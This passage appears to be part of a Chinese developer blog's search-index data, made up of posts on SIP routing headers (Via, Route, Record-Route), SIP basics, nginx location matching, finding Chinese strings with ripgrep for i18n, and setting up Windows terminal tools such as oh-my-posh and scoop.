route的作用是指明下一站的目的地。虽然route请求是在请求发送出去时就添加,但是可以进添加一个。 比喻: 第一次离开家的人,可能并不知道如何到达海南,但是他知道如何到达自己的省会。这个省会就是sip终端配置的外呼代理。每次经过一个站点时,就把这个站点记录到record-route中。record-route会在180或者183,或200ok时,发送给主叫的话机。 Tip record-route 何时添加: 当请求从uas发出去时 何时删除: 为dialog中的后续请求,指明到达目的地的路径 作用: 为dialog中的后续请求,指明到达目的地的路径 比喻: 当一个uac收到180之后,这个180中带有了record-route,例如p1,p2,p3。那么后续的ACK请求,就可以理由record-route来生成route: p1, p2, p3。 Address-of-Record: An address-of-record (AOR) is a SIP or SIPS URI that points to a domain with a location service that can map the URI to another URI where the user might be available. Typically, the location service is populated through registrations. An AOR is frequently thought of as the \u0026ldquo;public address\u0026rdquo; of the user. \u0026ndash; rfc3261\nThe difference between a contact address and an address-of-record is like the difference between a device and its user. While there is no formal distinction in the syntax of these two forms of addresses, contact addresses are associated with a particular device, and may have a very device-specific form (like sip:10.0.0.1, or sip:edgar@ua21.example.com). An address-of-record, however, represents an identity of the user, generally a long-term identity, and it does not have a dependency on any device; users can move between devices or even be associated with multiple devices at one time while retaining the same address-of-record. A simple URI, generally of the form \u0026lsquo;sip:egdar@example.com\u0026rsquo;, is used for an address-of-record. \u0026ndash;rfc3764\n1. 
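上面关于 Via 的比喻(每经过一个地方就记下地名,响应才能原路返回)可以用一个假设性的简化模型来演示:请求每经过一跳,把自己压到 Via 列表最上面;响应则总是发往最上面的 Via。这不是真实的 SIP 协议栈,只是帮助理解顺序:

```python
# 示意:Via 像栈一样工作 —— 最新的排在最上面,响应按 Via 自上而下原路返回
def forward_request(vias, hop):
    return [hop] + vias            # 新 Via 压到最上面

def next_response_hop(vias):
    return vias[0]                 # 响应发往最上面的 Via

vias = []
for hop in ["a", "p1", "p2", "p3"]:
    vias = forward_request(vias, hop)

print(vias)  # ['p3', 'p2', 'p1', 'a']
```

这正好对应时序图里 b 收到的 INVITE 带 via: a,p1,p2,p3,而 180/200 响应先回给 p3、再逐级回到 a。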
Record-route写法 u1 -\u0026gt; p1 -\u0026gt; p2 -\u0026gt; p3 -\u0026gt; p4,\n最后经过的排在最上面或者最前面。\n多行写法\nINVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p4.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p3.middle.com\u0026gt; Record-Route: \u0026lt;sip:p2.example.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; Record-Route记录的是从主叫到被叫的过程,其中Record-Route的顺序非常重要。因为这个顺序会影响Route字段的顺序。\n因为loose_route是从最上面的route字段来决定下一条的地址。\n所以,对于主叫来说,route的顺序和Record-Router相反。对于被叫来说,route字段和Record-Route字段相同。\n对于某些使用不同协议对接的不同代理的时候,会一次性的增加两次Record-Route。\n例如下面的,AB直接是tcp的,BC之间是udp的。那么INVITE从A到C之后,会在最上面增加两个。 A \u0026ndash;tcp\u0026ndash; B \u0026ndash;udp\u0026ndash; C\nRecord-Route: \u0026lt;sip:B_ip;transport=udp\u0026gt; Record-Route: \u0026lt;sip:B_ip;transport=tcp\u0026gt; 单行写法\nINVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p4.domain.com;lr\u0026gt;,\u0026lt;sip:p3.middle.com\u0026gt;,\u0026lt;sip:p2.example.com;lr\u0026gt;,\u0026lt;sip:p1.example.com;lr\u0026gt; 2. 
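上面说到:对于主叫来说,Route 的顺序和 Record-Route 相反;对于被叫来说,两者相同。用 Python 做一个示意(p1..p4 沿用正文 u1 -> p1 -> p2 -> p3 -> p4 的例子,假设性实现):

```python
# 示意:由响应中携带的 Record-Route 生成后续请求(如 ACK、BYE)的 Route 集
# Record-Route 自上而下为 p4,p3,p2,p1 —— 最后经过的排在最上面
def route_set(record_route, is_caller):
    # 主叫方向与 Record-Route 顺序相反,被叫方向与其相同
    return list(reversed(record_route)) if is_caller else list(record_route)

rr = ["p4", "p3", "p2", "p1"]
print(route_set(rr, is_caller=True))   # ['p1', 'p2', 'p3', 'p4']
```

也就是说,主叫发 ACK 时第一跳是 p1,被叫发起的序列化请求第一跳则是 p4。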
Via 写法 最新的排在最上面 ","permalink":"https://wdd.js.org/opensips/ch1/via-route-record-route/","summary":"sequenceDiagram title French Words I Know autonumber participant a participant p1 participant p2 participant p3 participant b a-\u003e\u003ep1 : INVITE route: p1, via: a p1-\u003e\u003ep2: INVITE via: a,p1, rr: p1 p2-\u003e\u003ep3: INVITE via: a,p1,p2 rr: p1,p2 p3-\u003e\u003eb: INVITE via: a,p1,p2,p3 rr: p1,p2,p3 b--\u003e\u003ep3: 180 via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 180 via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 180 via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 180 via: a rr: p1,p2,p3 b--\u003e\u003ep3: 200 OK via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 200 Ok via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 200 Ok via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 200 Ok via: a rr: p1,p2,p3 a-\u003e\u003ep1 : ACK via: a, route: p1,p2,p3 p1-\u003e\u003ep2: ACK via: a,p1, route: p2,p3 p2-\u003e\u003ep3: ACK via: a,p1,p2 route: p3 p3-\u003e\u003eb: ACK via: a,p1,p2,p3 rr代表record-route头。","title":"Via route Record-Route的区别"},{"content":"SIP是VoIP的基石,相当于HTTP协议在Web服务器里的角色。如果你熟悉HTTP协议,那么你可以在SIP协议中找到许多和HTTP中熟悉的东西,例如请求头,请求体,响应码之类概念,这是因为SIP协议的设计,很大程度上参考了HTTP协议。\n如果想要学习VoIP,那么SIP协议是你务必掌握敲门砖。\n1. SIP组件 UAC: 例如sip终端,软电话,话机 UAS: sip服务器 UA: ua既可以当做uac也可以当做uas 代理服务器 重定向服务器 注册服务器 网关 PSTN 公共交换电话网 2. SBC 边界会话控制器 SBC是Session Border Controller的缩写,具有一下几个功能。\n拓扑隐藏:隐藏所有内部网络的信息。 媒体流管理:设置语音流编码规则,转换等 增加能力:例如Refer, 3CPP 维护NAT映射: 访问控制 媒体加密:例如外部网络用SRTP, 内部网络用RTP 3. sip注册过程 下面简化注册逻辑,省略了验证和过期等字段:\n对于分机来说,注册服务器的地址是需要设置的 分机向注册服务器发请求,说:你好,注册服务器,我是8005,我的地址是200.180.1.1,以后你可以用这个地址联系我。 注册服务器回复:好的,注册成功 4. sip服务器的类型 4.1. 代理服务器 4.2. 重定向服务器 4.3. 背靠背UA服务器 背靠背UA服务器有两个作用\n隐藏网络拓扑结构 有些时候,路由无法到达,只能用背靠背UA服务器 5. 常用sip请求方法 比较常用的是下面的\n常用的几个是:register, invite, ack, bye, cancel。除了cancel和ack不需要认证外,其余的请求都需要认证。 register自不必说,invite和bye是需要认证的。\n对于我们不信任的ua,我们不允许他们呼叫。对于未认证的bye,也需要禁止。后者可以防止恶意的bye请求,挂断正常的呼叫。\ninvite除了re-invite的情况,其余的都属于初始化请求,需要着重关心的。而对于bye这种序列化请求,只需要按照record-route去路由。\n6. sip响应状态码 7. 
sip对话流程图 从上图可以看出,从invite请求到200ok之间的信令,都经过了代理服务器。但是200ok之后的ack,确没有经过代理服务器,如果想要所有信令都经过代理服务器,需要在sip消息头record-routing 指定代理服务器的地址\n8. 请求与响应报文 9. 事务与对话的区别 重点:\n从INVITE请求到最终的响应(注意1xx不是最终响应,非1xx的都是最终响应)之间,称为事务。一个事务可以带有多个消息组成,并经过多个ua。 ack请求比较特殊,但是ack不是事务。如果被叫接通后,超时未收到主叫方的ack, 会怎样?是否会再次发送200OK tcp三次握手建立连接,sip:invite-\u0026gt;200ok-\u0026gt;ack,可以理解为三次握手建立对话。 bye请求和200ok算作一个事务 dialog建立的前提是呼叫接通,如果呼叫没有接通,则没有dialog。 dialog可以由三个元素唯一确定。callId, from字段中的tag, to字段中的tag。 10. sip底层协议 SIP协议的结构 SIP协议是一个分层的协议,意味着各层之间是相互独立的\n最底层:SIP编码的语法 BNF语法 第二层:传输层 传输层定义如何接收和发送消息,SIP常用的传输层可以是udp, tcp, websocket等等 第三层:事务层 事务是一个请求和最终的响应称为一个事务,例如invite, 200ok是一个事务 第四层:事务用户层 所有的SIP实体,除了无状态的代理,都称为事务用户层。常见的uac, uas都是事务用户层 11. voip总体架构 12. 参考 ","permalink":"https://wdd.js.org/opensips/ch1/sip-overview/","summary":"SIP是VoIP的基石,相当于HTTP协议在Web服务器里的角色。如果你熟悉HTTP协议,那么你可以在SIP协议中找到许多和HTTP中熟悉的东西,例如请求头,请求体,响应码之类概念,这是因为SIP协议的设计,很大程度上参考了HTTP协议。\n如果想要学习VoIP,那么SIP协议是你务必掌握敲门砖。\n1. SIP组件 UAC: 例如sip终端,软电话,话机 UAS: sip服务器 UA: ua既可以当做uac也可以当做uas 代理服务器 重定向服务器 注册服务器 网关 PSTN 公共交换电话网 2. SBC 边界会话控制器 SBC是Session Border Controller的缩写,具有一下几个功能。\n拓扑隐藏:隐藏所有内部网络的信息。 媒体流管理:设置语音流编码规则,转换等 增加能力:例如Refer, 3CPP 维护NAT映射: 访问控制 媒体加密:例如外部网络用SRTP, 内部网络用RTP 3. sip注册过程 下面简化注册逻辑,省略了验证和过期等字段:\n对于分机来说,注册服务器的地址是需要设置的 分机向注册服务器发请求,说:你好,注册服务器,我是8005,我的地址是200.180.1.1,以后你可以用这个地址联系我。 注册服务器回复:好的,注册成功 4. sip服务器的类型 4.1. 代理服务器 4.2. 重定向服务器 4.3. 背靠背UA服务器 背靠背UA服务器有两个作用\n隐藏网络拓扑结构 有些时候,路由无法到达,只能用背靠背UA服务器 5. 常用sip请求方法 比较常用的是下面的\n常用的几个是:register, invite, ack, bye, cancel。除了cancel和ack不需要认证外,其余的请求都需要认证。 register自不必说,invite和bye是需要认证的。\n对于我们不信任的ua,我们不允许他们呼叫。对于未认证的bye,也需要禁止。后者可以防止恶意的bye请求,挂断正常的呼叫。\ninvite除了re-invite的情况,其余的都属于初始化请求,需要着重关心的。而对于bye这种序列化请求,只需要按照record-route去路由。\n6. sip响应状态码 7. sip对话流程图 从上图可以看出,从invite请求到200ok之间的信令,都经过了代理服务器。但是200ok之后的ack,确没有经过代理服务器,如果想要所有信令都经过代理服务器,需要在sip消息头record-routing 指定代理服务器的地址\n8. 请求与响应报文 9. 
事务与对话的区别 重点:\n从INVITE请求到最终的响应(注意1xx不是最终响应,非1xx的都是最终响应)之间,称为事务。一个事务可以带有多个消息组成,并经过多个ua。 ack请求比较特殊,但是ack不是事务。如果被叫接通后,超时未收到主叫方的ack, 会怎样?是否会再次发送200OK tcp三次握手建立连接,sip:invite-\u0026gt;200ok-\u0026gt;ack,可以理解为三次握手建立对话。 bye请求和200ok算作一个事务 dialog建立的前提是呼叫接通,如果呼叫没有接通,则没有dialog。 dialog可以由三个元素唯一确定。callId, from字段中的tag, to字段中的tag。 10.","title":"SIP协议简介"},{"content":"1. 概念理解 务必要能理解SIP的重要概念,特别是事务、Dialog。参考https://www.yuque.com/wangdd/opensips/fx5pyy 概念是非常重要的东西,不理解概念,越学就会越吃力 2. 时序图 时序图是非常重要的,培训时,一般我会要求学员务必能够手工绘制时序图。因为只有能够手工绘制时序图了,在排查问题时,才能够从抓包工具给出的时序图中分析出问题所在。\nRFC3665 https://datatracker.ietf.org/doc/html/rfc3665 中提供了很多经典的时序图,建议可以去临摹。\n","permalink":"https://wdd.js.org/opensips/ch1/study-tips/","summary":"1. 概念理解 务必要能理解SIP的重要概念,特别是事务、Dialog。参考https://www.yuque.com/wangdd/opensips/fx5pyy 概念是非常重要的东西,不理解概念,越学就会越吃力 2. 时序图 时序图是非常重要的,培训时,一般我会要求学员务必能够手工绘制时序图。因为只有能够手工绘制时序图了,在排查问题时,才能够从抓包工具给出的时序图中分析出问题所在。\nRFC3665 https://datatracker.ietf.org/doc/html/rfc3665 中提供了很多经典的时序图,建议可以去临摹。","title":"学习建议"},{"content":" 书名 Packet Guide to Voip over IP 作者 Bruce Hartpence 状态 已读完 简介 Go under the hood of an operating Voice over IP network, and build your knowledge of protocol \u0026hellip;. 读后感 新技术出现的时机 Pulling the trigger early might put you at risk of making the wrong decision in terms of vendor or protocol. Adopting late might put you behind the competition or make you rush to deploy a system that is not well understood by the local staff.\n技术应用出现的太早则会承受巨大的风险,出现的太晚则失去竞争力。\n两种SIP信令 VoIP protocols are broken into two categories: signaling and transport.\nVoIP的信令可以分为两类,传输信令 与 传输媒体\n美梦与噩梦 It was a golden dream for some (consumers) and a nightmare for others; namely, the providers.\n新技术的出现,对开拓者来说是黄金美梦,对守旧者来说,则是噩梦。\n出局 Some of these services offered calling plans for less than half the price of traditional carriers. 
Some of them, most notably Skype, had as one of their goals putting telephone companies out of business\nUDP的另一种理解 In fact,UDP is sometimes considered a fire-and-forget protocol because once the packet leaves the sender, we think nothing more about it.\nUDP可以理解成一种一旦发送,则忘记的协议。\n","permalink":"https://wdd.js.org/posts/2022/07/vl3zhk/","summary":"书名 Packet Guide to Voip over IP 作者 Bruce Hartpence 状态 已读完 简介 Go under the hood of an operating Voice over IP network, and build your knowledge of protocol \u0026hellip;. 读后感 新技术出现的时机 Pulling the trigger early might put you at risk of making the wrong decision in terms of vendor or protocol. Adopting late might put you behind the competition or make you rush to deploy a system that is not well understood by the local staff.","title":"读书笔记 - Packet Guide to VoIP"},{"content":"1. 前提说明 项目已经处于维护期 项目一开始并没有考虑多语言,所以很多地方都是写死的中文 现在要给这个项目添加多语言适配 2. 工具选择 https://www.npmjs.com/package/i18n https://www.npmjs.com/package/vue-i18n 3. 难点 项目很大,中文可能存在于各种文件中,例如html, vue, js, typescript等等, 人工查找不现实 所以首先第一步是要找出所有的中文语句 4. 让文本飞 安装ripgrep apt-get instal ripgrep 搜索所有包含中文的代码: rg -e '[\\p{Han}]' \u0026gt; han.all.md 给所有包含中文的代码,按照文件名,和出现的次数排序: cat han.all.md | awk -F: '{print $1}' | uniq -c | sort -nr \u0026gt; stat.han.md 这一步主要是看看哪些文件包含的中文比较多 按照中文的语句,排序并统计出现的次数: cat han.all.md |rg -o -e '([\\p{Han}]+)' | sort | uniq -c | sort -nr \u0026gt; word.han.md 经过上面4步,基本上可以定位出哪些代码中包含中文,中文的语句有哪些。\n","permalink":"https://wdd.js.org/posts/2022/07/mv0hk1/","summary":"1. 前提说明 项目已经处于维护期 项目一开始并没有考虑多语言,所以很多地方都是写死的中文 现在要给这个项目添加多语言适配 2. 工具选择 https://www.npmjs.com/package/i18n https://www.npmjs.com/package/vue-i18n 3. 难点 项目很大,中文可能存在于各种文件中,例如html, vue, js, typescript等等, 人工查找不现实 所以首先第一步是要找出所有的中文语句 4. 
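上文用 rg -e '[\p{Han}]' 在代码库里查找含中文的语句。如果想在脚本里做同样的事,可以用 Python 写个示意(注意 Python 内置 re 不支持 \p{Han},这里用常用汉字区间 \u4e00-\u9fff 近似):

```python
# 示意:从一行代码中提取所有连续的中文片段,效果类似 rg -o -e '([\p{Han}]+)'
import re

HAN = re.compile(r"[\u4e00-\u9fff]+")

def han_words(text: str) -> list:
    return HAN.findall(text)

print(han_words('console.log("你好, world 世界")'))  # ['你好', '世界']
```

把每行的提取结果丢进计数器里排序,就相当于正文里 sort | uniq -c | sort -nr 那一步。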
让文本飞 安装ripgrep apt-get instal ripgrep 搜索所有包含中文的代码: rg -e '[\\p{Han}]' \u0026gt; han.all.md 给所有包含中文的代码,按照文件名,和出现的次数排序: cat han.all.md | awk -F: '{print $1}' | uniq -c | sort -nr \u0026gt; stat.han.md 这一步主要是看看哪些文件包含的中文比较多 按照中文的语句,排序并统计出现的次数: cat han.all.md |rg -o -e '([\\p{Han}]+)' | sort | uniq -c | sort -nr \u0026gt; word.han.md 经过上面4步,基本上可以定位出哪些代码中包含中文,中文的语句有哪些。","title":"中途多语言适配"},{"content":" 1. 我为什么会知道0 A.D. 这款游戏? 最近切换到windows开发,用了scoop这个包管理工具来安装软件,随便逛逛的时候,发现scoop还可以用来安装游戏,然后我就在里面看了一下,然后排名第一的是一个名叫 0 A.D.的游戏,然后我就安装,并试玩了一下。\n2. 0 A.D. 这个名字是啥意思? 基督教称耶稣诞生的那年为公元元年, A.D. 就是Anno Domini(A.D.)(拉丁)的缩写,对应的公元前就是而在耶稣诞生之前,称为B.C. Before Christ(B.C.).\n我们现在的阳历,例如今年是2022年,这其实就是公元2022年。对应的公元元年,对中国来说,大致在西汉年间。\n所以 0 A.D. 其实的意思就是一个不存在的元年。\n“0 A.D.” is a time period that never actually existed:\n3. 0 A.D. 是什么类型的游戏? 如果你玩过红警,0 A.D.的有点像红警。 官方的介绍0AD是一个基于历史的实时策略游戏。 如果你玩过部落冲突,0AD其实也有点类似部落冲突。\n4. 0 A.D. 有什么特点? 跨平台, windows, mac, linux都可以玩 免费 历史悠久,项目开始于2001 还处于开发阶段 可玩性还不错 基于真实历史,所以玩游戏的时候,也是能够学点历史的。里面有是14个文明。 5. 有哪些玩法 单机和AI对战 在线组队玩 6. FAQ 如何设置中文界面 默认的游戏不带中文语言的,实际上它是有中文的语言包的,可以参考 参考 https://baike.baidu.com/item/%E5%85%AC%E5%85%83/17855 ","permalink":"https://wdd.js.org/posts/2022/07/gxog1n/","summary":" 1. 我为什么会知道0 A.D. 这款游戏? 最近切换到windows开发,用了scoop这个包管理工具来安装软件,随便逛逛的时候,发现scoop还可以用来安装游戏,然后我就在里面看了一下,然后排名第一的是一个名叫 0 A.D.的游戏,然后我就安装,并试玩了一下。\n2. 0 A.D. 这个名字是啥意思? 基督教称耶稣诞生的那年为公元元年, A.D. 就是Anno Domini(A.D.)(拉丁)的缩写,对应的公元前就是而在耶稣诞生之前,称为B.C. Before Christ(B.C.).\n我们现在的阳历,例如今年是2022年,这其实就是公元2022年。对应的公元元年,对中国来说,大致在西汉年间。\n所以 0 A.D. 其实的意思就是一个不存在的元年。\n“0 A.D.” is a time period that never actually existed:\n3. 0 A.D. 是什么类型的游戏? 如果你玩过红警,0 A.D.的有点像红警。 官方的介绍0AD是一个基于历史的实时策略游戏。 如果你玩过部落冲突,0AD其实也有点类似部落冲突。\n4. 0 A.D. 有什么特点? 跨平台, windows, mac, linux都可以玩 免费 历史悠久,项目开始于2001 还处于开发阶段 可玩性还不错 基于真实历史,所以玩游戏的时候,也是能够学点历史的。里面有是14个文明。 5. 有哪些玩法 单机和AI对战 在线组队玩 6. FAQ 如何设置中文界面 默认的游戏不带中文语言的,实际上它是有中文的语言包的,可以参考 参考 https://baike.baidu.com/item/%E5%85%AC%E5%85%83/17855 ","title":"0 A.D. 
一款开发了21年还未release的游戏"},{"content":"HTTP URL的格式复习 ://:@:/;?#frag\nscheme 协议, 常见的有http, https, file, ftp等 : 用户名和密码 host 主机或者IP port 端口号 path 路径 params 参数 用的比较少 query 查询参数 frag 片段,资源的一部分,浏览器不会把这部分发给服务端 关于frag片段 浏览器加载一个网页,网页可能有很多章节的内容,frag片段可以告诉浏览器,应该将某个特定的点显示在浏览器中。\n例如 https://github.com/wangduanduan/jsplumb-chinese-tutorial/blob/master/api/anchors.js#L18\n这里的#L8就是一个frag片段, 当浏览器打开这个页面的时,就会跳到对应的行\n在网络面板,也可以看到,实际上浏览器发出的请求,也没有带有frag参数\nVue 在Vue中,默认的路由就是这种frag片段。 这种路由只对浏览器有效,并不会发送到服务端。\n所以在一个单页应用中,服务端是无法根据URL知道用户访问的是什么页面的。\n所以实际上nginx无法根据frag片段进行拦截。\nnginx路径拦截 location [modifier] [URI] { ... ... } modifier\n= 完全匹配 ^~ 正则匹配,并且必须是以特定的URL开头 ~ 正则匹配,且大小写敏感 ~* 正则匹配,大小写不敏感 nginx路径匹配规则\n首先使完全匹配,一旦匹配,则匹配结束,进行后续数据处理 完全匹配无法找到,则进行最长URL匹配,类似 ^~ 最长匹配找不到,则按照 ~或者~*的方式匹配 最后按照 / 的默认匹配 ","permalink":"https://wdd.js.org/posts/2022/07/gt6a84/","summary":"HTTP URL的格式复习 ://:@:/;?#frag\nscheme 协议, 常见的有http, https, file, ftp等 : 用户名和密码 host 主机或者IP port 端口号 path 路径 params 参数 用的比较少 query 查询参数 frag 片段,资源的一部分,浏览器不会把这部分发给服务端 关于frag片段 浏览器加载一个网页,网页可能有很多章节的内容,frag片段可以告诉浏览器,应该将某个特定的点显示在浏览器中。\n例如 https://github.com/wangduanduan/jsplumb-chinese-tutorial/blob/master/api/anchors.js#L18\n这里的#L8就是一个frag片段, 当浏览器打开这个页面的时,就会跳到对应的行\n在网络面板,也可以看到,实际上浏览器发出的请求,也没有带有frag参数\nVue 在Vue中,默认的路由就是这种frag片段。 这种路由只对浏览器有效,并不会发送到服务端。\n所以在一个单页应用中,服务端是无法根据URL知道用户访问的是什么页面的。\n所以实际上nginx无法根据frag片段进行拦截。\nnginx路径拦截 location [modifier] [URI] { ... ... 
} modifier\n= 完全匹配 ^~ 正则匹配,并且必须是以特定的URL开头 ~ 正则匹配,且大小写敏感 ~* 正则匹配,大小写不敏感 nginx路径匹配规则\n首先使完全匹配,一旦匹配,则匹配结束,进行后续数据处理 完全匹配无法找到,则进行最长URL匹配,类似 ^~ 最长匹配找不到,则按照 ~或者~*的方式匹配 最后按照 / 的默认匹配 ","title":"请问nginx 能否根据 frag 片段 进行路径转发?"},{"content":"我已经有5年没有用过windows了,再次在windows上搞开发,发现了windows对于开发者来说,友好了不少。\n首先是windows terminal, 这个终端做的还不错。\n其次是一些常用的命令,比如说ssh, scp等,都已经默认附带了,不用再安装。\n还有包管理工具scoop, 命令行提示工具 oh-my-posh, 以及powershell 7 加载一起,基本可以迁移80%左右的linux上的开发环境。\n特别要说明一下scoop, 这个包管理工具,我安装了在linux上常用的一些软件。\n包括有以下的软件,而且软件的版本都还蛮新的。\n0ad 0.0.25b games 7zip 22.00 main curl 7.84.0_4 main curlie 1.6.9 main diff-so-fancy 1.4.3 main duf 0.8.1 main everything gawk 5.1.1 main git 2.37.0.windows.1 main git-aliases 0.3.5 extras git-chglog 0.15.1 main gzip 1.3.12 main hostctl 1.1.2 main hugo 0.101.0 main jq 1.6 main klogg 22.06.0.1289 extras make 4.3 main neofetch 7.1.0 main neovim 0.7.2 main netcat 1.12 main nodejs-lts 16.16.0 main ntop 0.3.4 main procs 0.12.3 main ripgrep 13.0.0 main sudo 0.2020.01.26 main tar 1.23 main 另外一个就是powershell 7了,贴下我的profile配置。\n智能提示,readline都有了\noh-my-posh init pwsh --config ~/default.omp.json | Invoke-Expression Import-Module PSReadLine New-Alias -Name ll -Value ls if ($host.Name -eq \u0026#39;ConsoleHost\u0026#39;) { Import-Module PSReadLine Set-PSReadLineOption -EditMode Emacs } ","permalink":"https://wdd.js.org/posts/2022/07/crofgr/","summary":"我已经有5年没有用过windows了,再次在windows上搞开发,发现了windows对于开发者来说,友好了不少。\n首先是windows terminal, 这个终端做的还不错。\n其次是一些常用的命令,比如说ssh, scp等,都已经默认附带了,不用再安装。\n还有包管理工具scoop, 命令行提示工具 oh-my-posh, 以及powershell 7 加载一起,基本可以迁移80%左右的linux上的开发环境。\n特别要说明一下scoop, 这个包管理工具,我安装了在linux上常用的一些软件。\n包括有以下的软件,而且软件的版本都还蛮新的。\n0ad 0.0.25b games 7zip 22.00 main curl 7.84.0_4 main curlie 1.6.9 main diff-so-fancy 1.4.3 main duf 0.8.1 main everything gawk 5.1.1 main git 2.37.0.windows.1 main git-aliases 0.3.5 extras git-chglog 0.15.1 main gzip 1.3.12 main hostctl 1.1.2 main hugo 0.101.0 main jq 1.6 main klogg 22.06.0.1289 extras make 4.3 main neofetch 7.1.0 main neovim 0.7.2 main 
netcat 1.","title":"windows 上的命令行体验"},{"content":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 时间不固定,有时1s到10s都可能有,时间不固定。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上倒找:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就回去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init pwsh --config ~/default.omp.json | Invoke-Expression Import-Module PSReadLine New-Alias -Name ll -Value ls if ($host.Name -eq \u0026#39;ConsoleHost\u0026#39;) { Import-Module PSReadLine Set-PSReadLineOption -EditMode Emacs } ","permalink":"https://wdd.js.org/posts/2022/07/igur01/","summary":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 
时间不固定,有时1s到10s都可能有,时间不固定。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上倒找:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就回去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init pwsh --config ~/default.","title":"powershell oh-my-posh 加载数据太慢"},{"content":"0. 前提条件 系统是windows11 已经安装过powershell 7 安装过vscode编辑器 默认情况下,所有命令均在powershell下执行的 1. 安装 oh my posh 1.2 方式1: 通过代理安装 假如你有socks代理,那么可以用winget安装\n打开你的power shell 执行类似下面的命令,来配置代理\n$env:all_proxy=\u0026#34;socks5://127.0.0.1:1081\u0026#34; 如果没有socks代理,最好不要用winget安装,因为速度太慢。然后执行:\nwinget install JanDeDobbeleer.OhMyPosh -s winget 1.2 方式2: 下载exe,手工安装 再oh-my-posh的release界面 https://github.com/JanDeDobbeleer/oh-my-posh/releases\n可以看到很多版本的文件,windows选择install-amd64.exe, 下载完了之后手工点击执行来安装。\nhttps://github.com/JanDeDobbeleer/oh-my-posh/releases/download/v8.13.1/install-amd64.exe\n2. 
配置 oh-my-posh 在powershell中执行下面的命令,vscode回打开对应的文件。\ncode $PROFILE 在文件中粘贴如下的内容:\noh-my-posh init pwsh | Invoke-Expression 保存文件,然后再次打开windows termial, 输入下面的命令来reload profile\n. $PROFILE 然后你可以看到终端出现了提示符,有可能有点卡,第一次是有点慢的。但是很多符号可能是乱码,因为是没有配置相关的字体。\n3. 字体配置 3.1 安装字体 下载文件 https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip 解压文件 打开设置,在个性化》字体中,将之前下载好的所有字体,拖动到下面的红框中,字体就会自动安装 3.2 windows termial字体配置 用vscode打开对windows termial的配置json文件,在profiles.default.font中配置如下字体\n\u0026#34;font\u0026#34;: { \u0026#34;face\u0026#34;: \u0026#34;MesloLGM NF\u0026#34; } 配置之后,需要重启windows termial\n3.3 vscode termial 配置 在vscode中输入 Open Sett, 就可以打开设置的json文件。\n在配置中设置如下的内容\n\u0026#34;terminal.integrated.fontFamily\u0026#34;: \u0026#34;MesloLGM NF\u0026#34;, 4. 效果展示 4.1 windows terminal 4.2 vscode terminal 5. 体验 优点 oh-my-posh 总体还不错,能够方便的展示git相关的信息 缺点 性能拉跨,每次终端可能需要0.5s到2s之间的延迟卡顿,相比于linux上的shell要慢不少 6. 参考文献 https://ohmyposh.dev/docs/installation/prompt ","permalink":"https://wdd.js.org/posts/2022/07/ssgb9f/","summary":"0. 前提条件 系统是windows11 已经安装过powershell 7 